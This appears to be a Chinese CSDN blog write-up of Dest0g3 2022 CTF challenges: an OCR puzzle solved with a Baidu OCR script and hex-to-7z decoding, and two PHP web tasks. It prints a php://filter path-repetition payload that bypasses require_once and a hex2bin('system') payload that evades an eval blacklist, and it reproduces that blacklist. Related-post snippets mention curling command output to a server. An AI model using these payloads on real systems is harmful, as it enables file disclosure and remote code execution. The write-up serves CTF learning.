[Dest0g3 2022] M新赛-AI-OCR,web-phpdest,SimpleRCE

最新推荐文章于 2022-08-28 18:36:56 发布
最新推荐文章于 2022-08-28 18:36:56 发布
阅读量481 收藏
点赞数
分类专栏: web 文章标签: Dest0g3
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52640415/article/details/124998778
版权

目录

AI-OCR

web-phpdest

web-simpleRCE

萌新这个比较适合。这两个行当不大明白,只作了1个AI和两个web,web这块分数很高,可惜了。不过术业有专攻,不可能全明白。

AI-OCR

说是OCR就是OCR识别呗,不过这题手工如果一开始作也许能拿更多分,OCR识别后还得一个个改。

下来的附件是个PNG图片,由于png只是像素流,如果宽度变化以后就会出现变斜了的情况,所以这里先把图片改成1888*800,字符就全变正了

第2步就是把字符正过来。用百度的一个库

import ssl
from aip import AipOcr
from PIL import Image,ImageGrab

#pip install baidu-aip 
""" 你的 APPID AK SK """
......
client = AipOcr(APP_ID, API_KEY, SECRET_KEY)

""" 读取图片 """
def get_file_content(filePath):
    with open(filePath, 'rb') as fp:
        return fp.read()

image = get_file_content('flag_pic3.png')

""" 调用通用文字识别, 图片参数为本地图片 """
a = client.basicGeneral(image);
print(a);

这里有个问题,有空格认不出来还有把0认成O的,这个费了不少时间。眼都花了。

然后把这些数字(显然是16进制编码过的,开头是7z)存成文件

a = '''
377ABCAF271C000451FCF397500200000000000062000000000000001D9C97C8E004D002485D0022
194A676D2FDE351A055C168F9710364AE2D581126E378F3B4C47E15E2E80B74234B849430A221F40
C086E06B24ADAAC47F32CB62CADD154B50723E65E50CDF99CC2B953916AD2204D70C15FB493BD4C2
E1F93902FB3563190ACEE58CC01621BB2AAAB6EED8CE892FEF5F0927E2C4BCD7C188277D09D03579
95A2FB65D31CD99C853D7BAF52EAD8555920D1672B4A3B713917E98FB324AD225A3FA2AFAC1435FF
E31ED0C0CEF0CA0B68C0CCCA81C458680D7C75139429D282984933F7ACFDFB127321D9F4EFC0FEAA
E92F985D3C457E90AFBC4DA9D11B23E507A0953036A2EC1D75D69CD1F6A9F0790B1AB02D6C2AFFDF
66A2E7E56A1070FBCD316813E12DF9E26FC4813D419792A65960D4D97EDFA7A978A0385C04CF36EF
DE3B07DF9B9405253EAA838149910F2571FAA4A8E085D1567C5C17C9B3400F91FBFE6B47E052BA07
097C9D77803D3A45E3477FE324603179C7CA6A128CDC0F7E834812618AD4C79934226637E9300C55
95E355139A2ECF661A5F63750A6A0035ACF52417AF3A1C1FEA14471D074C27F81C719D98717F4ECD
32918BD15C18AB93769E94DDEFD3B6FAF4DDD6628BA44BDEF574FCCD5589334EA8063D7B27A2F060
0FC864D010A7F0CEC9B9395434878D01943887194342F9D34FC8F12DD4556ED5A5A36667F9319A03
95DB9A445B94C44771B406F962B1CFC8535BA0D3EE3DDDEB876C95092AAB192B168A732F3A7B9E81
56C403C583983F5527A0D6C5D6928481D56955474046D9FC17A2DE21F3D6FC4C69644E7C6A141BE9
48A417A33D62C6FF6DFAC702A0FC101748D9A9C64A6A0000010406000109825000070B0100012121
01000C84D100080A0196EAFE6000000501190A000000000000000000001119004400650073007400
3000670033002E00740078007400000019020000140A0100B547E05F6654D8011506010020000000
000000
'''

print(bytes.fromhex(a))
open('aaa.7z', 'wb').write(bytes.fromhex(a.replace('\n','')))

 打开文件得到Base64编码的flag

#RGVzdDBnM3szNDUxMjA5OC0zMzA5LTc3MTItODg2NS03ODM0NjAyMjE2NDd9
#Dest0g3{34512098-3309-7712-8865-783460221647}

web-phpdest

web题原来没作过,比赛快结束了,别的都不会了,闲着也是闲着。从网上搜了一下。

 <?php
highlight_file(__FILE__);
require_once 'flag.php';
if(isset($_GET['file'])) {
    require_once($_GET['file']);
}

这个题就是个require_once漏洞,通过长目录名绕过,网上有。直接把内容复制下来(网上原话未加发动)得到flag

/?file=php://filter/convert.base64-encode/resource=/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/var/www/html/flag.php
Dest0g3{2c92226e-6d20-4784-8f24-2d0fd74d7080}

web-simpleRCE

这个也是搜的,有eval,其实就是绕过黑名单用hex2bin

<?php
highlight_file(__FILE__);
$aaa=$_POST['aaa'];
$black_list=array('^','.','`','>','<','=','"','preg','&','|','%0','popen','char','decode','html','md5','{','}','post','get','file','ascii','eval','replace','assert','exec','$','include','var','pastre','print','tail','sed','pcre','flag','scan','decode','system','func','diff','ini_','passthru','pcntl','proc_open','+','cat','tac','more','sort','log','current','\\','cut','bash','nl','wget','vi','grep');
$aaa = str_ireplace($black_list,"hacker",$aaa);
eval($aaa);
?>

用网上的方法把system16进制编码,再用?绕过cat flag。直接在firefox上用HackerBarV2(免费版)

POST
aaa=hex2bin('73797374656D')('/bin/ca? /fla?');

石氏是时试
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
CTF真题-Dest0g3CTF2022新赛
06-01
CTF真题-Dest0g3CTF2022新赛,来自BUUCTF。
Dest0g3-Java部分1
08-03
Dest0g3-Java部分1
Dest0g3 520迎新赛 writeup by 树木
JEWSWS的博客
05-29 3440
信息 用户名:树木敲阔爱 类型:分榜前三 排名:25 MISC Welcome to fxxking DestCTF 关注微信公众号,得到flag Dest0g3{W31c0m3_t0_DestCTF2022!} Pngenius 题目是一张PNG图片,很难不让人联想到隐写术,我们使用stegsolve打开 在R0G0B0发现了Password for zip,猜测图片包含ZIP,使用foremost进行分解 分解后发现有密码,使用刚刚解出来的密码解压,得到flag
Dest0g3 520迎新赛web部分writeup
weixin_45751765的博客
05-29 2013
Phpdest 访问日志可包含 直接getshell Easyphp 触发error直接得flag Simplerce 进制编码绕过 str_ireplace Easyssti Fuzz一下几个主要的blacklist 参考 https://xz.aliyun.com/t/9584#toc-32 0c过一下空格 Pharpop __destruct变量销毁会等程序运行完 但是有throw new error 利用php gc强制回收 浅析GC回收机制与phar反序列化 | Arsene.Tang
BUU Dest0g3 520迎新赛 WEB writeup
weixin_43610673的博客
05-29 2022
WEB phpdest <?php highlight_file(__FILE__); require_once 'flag.php'; if(isset($_GET['file'])) { require_once($_GET['file']); } require_once 绕过不能重复包含文件的限制 /?file=php://filter/convert.base64-encode/resource=/proc/self/root/proc/self/root/proc/self/r
Dest0g3 520迎新赛(上web
qq_62046696的博客
07-08 324
打开界面看见require_once,自然想到require然后include,确定了这是一道文件包含的题目, 然后看见第三行 require_once已经包含了,flag.php,最后require_once肯定也是包含flag.php,但是这个once只能包含一次所以我们就要绕过,想了一下用filter伪协议读取flag。php试一下 发现仍然是原界面,没任何回显 重复链接绕过 base64解码即可打开界面代码如下 构建数组报错POST:ctf[]=1,看见fl4g后面有点连接符,因为下面
在检测RCE漏洞时,判断RCE利用成功的方式有哪些(无回显情况)
weixin_42478365的博客
10-09 1985
第一种使用curl: curl "xxx.xxx.xxx.xxx/$(uname -a | awk '{print $1}')" 这条命令拼接了两处,第一处便是curl下我的一个vps服务器的80端口,第二处是显示内核版本。从服务器的web日志文件中看下效果: 发现操作系统的版本被拼接输出到后面,在面对没有回显的RCE或者CSRF都可以使用这个技巧。 第二种:DNSlog windows: 操作系统 盲注方式 windows %variable% linux variable 反引号 此处使用公网一个
DestroyIt - Destruction System
08-04
最新推出!现在版本 1.10 具有创建可破坏地形树木的能力了!使用 Unity 的地形系统来放置树木,然后再用 DestroyIt 来让它们变得完全可破坏。 注意:由于在 Unity 2018.3 中预制件系统的更改,因此 DestroyIt 1.10 ...
sb-2:简单博客2 https
05-08
锑2 ... 该脚本允许您准备模板并将网站写为markdown。...dest -blog --example1.html --example2.html -index.html -contact.html 指令 建立新网志 python3 sb-2 -n " My New Blog " 生成博客页面 python3 s
高透型Low-E玻璃节能效果的模拟应用
05-23
研究了高透型Low-E玻璃在豫北地区的节能效果,并利用DeST软件模拟计算了某办公楼采用普通玻璃与高透型Low-E玻璃方案下空调系统及采暖系统的负荷.结果表明,高透型Low-E玻璃适合在该地区使用;采用高透型低辐射玻璃后...
grading-board:hacklu2015网络挑战
05-01
写上去 预期的解决方案 给定的补丁程序表明已添加了一些安全性机制。 其中之一是黑名单,该黑名单过滤了搜索字符串中的某些字符: $ blacklist = array ( '\'' , '"' , '/' , '*' ); return str_replace ( $ blacklist , '' , $ input ); 但是此清理功能不完整,并且不过滤反斜杠字符,这使我们可以转义插入搜索查询的最后一个单引号,如下所示: WHERE first_name = ' injection here and escape last quote like so # \' OR last_name= ' injection here and escape last quote like so \ ' ORDER BY id ASC LIMIT 5 这使我们能够进行SQL注入,但是问题是我们无法
# Dest0g3 520迎新赛(更新中)
xiao_he0123的博客
07-25 335
Dest0g3 520迎新赛
Dest0g3 520迎新赛web部分
m0_62422842的博客
05-28 524
前言 以为迎新赛比较简单,谁知一点也不简单,也可能是我太菜了。正好借这次比赛可以学到很多东西。 phpdest 题目代码很简便,一看就知道是文件包含。 题目核心就是这个require_once函数。它与require一样都是包含函数,作用和语法也基本相同,唯一的区别就是php会检查该文件是否已经被包含过,如果该文件被包含过,则不会再次包含。这是这题最头疼的地方,用伪协议读取不出来可以说明该文件已经被包含了。那么接下来就要绕过该限制了。 绕过不能重复包含文件的限制 php的包含机制就是将已包含
Dest0g3 部分wp
qq_63267612的博客
08-28 1161
下载下来没有后缀,修改后缀.rar解压打开后有一堆文件,一个个打开查看,在document.xml里发现一长串base64解码后得到一串不知道什么的编码,百度搜索要用urllib.parse.unquote转码,如果直接用utf-8在线转换得不到下一步的密码,没搞懂怎么用的,先没写。存下来,发现有一个flag.txt,要密码,把压缩包扔进010,看看是不是伪加密,发现不是,尝试暴力破解也不行,看看图片是不是进行了什么隐写,放到stegsolve中,发现密码,这里的密码中间的空格要去掉。...
攻击和审计Docker容器02
蚁景网安学院
12-16 441
一、攻击Docker容器-场景在上一篇文章中攻击和审计Docker容器01,介绍了Docker容器的基础知识,在本篇文章中,我们将介绍通过攻击容器从而访问主机的系统,数据和资源。主要有以...
【组件攻击链】Spring全家桶各类RCE漏洞浅析
further_eye的博客
12-07 3256
尽管近期没有出现相关漏洞,但这些高风险漏洞依然不可忽视。本文涉及漏洞大多不需要复杂的配置就可以直接攻击成功,执行任意代码,危害较大。故开发者在使用Spring进行开发的过程中,一定要关注其历史风险点,规避高危漏洞,减少修改不必要的配置信息。
Dest0g3 520迎新赛web&misc
weixin_63231007的博客
07-19 1275
Destog3 520迎新赛web&misc题目复现
Dest0g3 520迎新赛wp复现
zhhhb1005的博客
08-28 309
放入 steg中观察发现password:Weak_Pas5w0rd然后放入kali中binwalk发现含有zip然后foremost进行分离,因为在steg中知道了密码,所以直接拿到flag。
替换非法字符,检查非法字符(白名单,黑名单)
alashan007的博客
02-23 2382
<?php /** string filter class * Date: 2013-01-09 * Author: fdipzone * Ver: v1.0 * * Func: * public replace 替换非法字符 * public check 检查是否含有非法字符 * private protect_white_list 保护白名单
ansible -m copy -a 'src= dest= mode= ' all 怎么同时复制多个文件
最新发布
06-06
ansible -m copy -a 'src="file1.txt file2.txt file3.txt" dest=/path/to/destination/ mode=644' all ``` 这将会同时复制 `file1.txt`、`file2.txt` 和 `file3.txt` 到指定的目标路径,并将它们的权限设置为 644...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值